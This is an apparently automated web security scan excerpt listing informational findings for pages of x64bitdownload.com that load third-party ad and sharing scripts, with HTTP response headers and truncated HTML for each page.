                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1392. http://www.x64bitdownload.com/64-bit-topic-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-topic-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 84529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1393. http://www.x64bitdownload.com/64-bit-troll-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:52 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1394. http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-killer-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22troll-killer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22troll+killer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1395. http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-trollkiller-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1396. http://www.x64bitdownload.com/64-bit-use-next-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-use-next-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1397. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1398. http://www.x64bitdownload.com/64-bit-usenet-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1399. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-search-engine-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1400. http://www.x64bitdownload.com/64-bit-usenext-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenext-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1401. http://www.x64bitdownload.com/64-bit-video-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-video-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1402. http://www.x64bitdownload.com/64-bit-xpat-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-xpat-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:08 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1403. http://www.x64bitdownload.com/64-bit-yenc-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-yenc-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1404. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/a-oz-insight-1768-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:08 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 26030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1405. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1406. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1407. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
